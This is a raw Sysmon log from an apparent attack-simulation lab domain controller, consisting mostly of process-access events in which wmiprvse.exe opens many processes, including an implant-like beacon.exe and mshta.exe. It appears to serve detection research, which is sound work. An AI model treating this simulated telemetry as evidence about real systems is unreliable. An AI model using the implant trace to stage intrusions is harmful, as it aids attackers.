16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237661Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237660Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237659Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237658Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237657Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237656Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237655Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002237654Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:52.974{05ADC7E1-6D64-603E-82AA-00000000AD01}13276\PSHost.132591775728374660.13276.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002237653Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237652Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237651Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237650Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237649Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237648Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237647Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237646Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237645Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237644Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237643Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237642Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 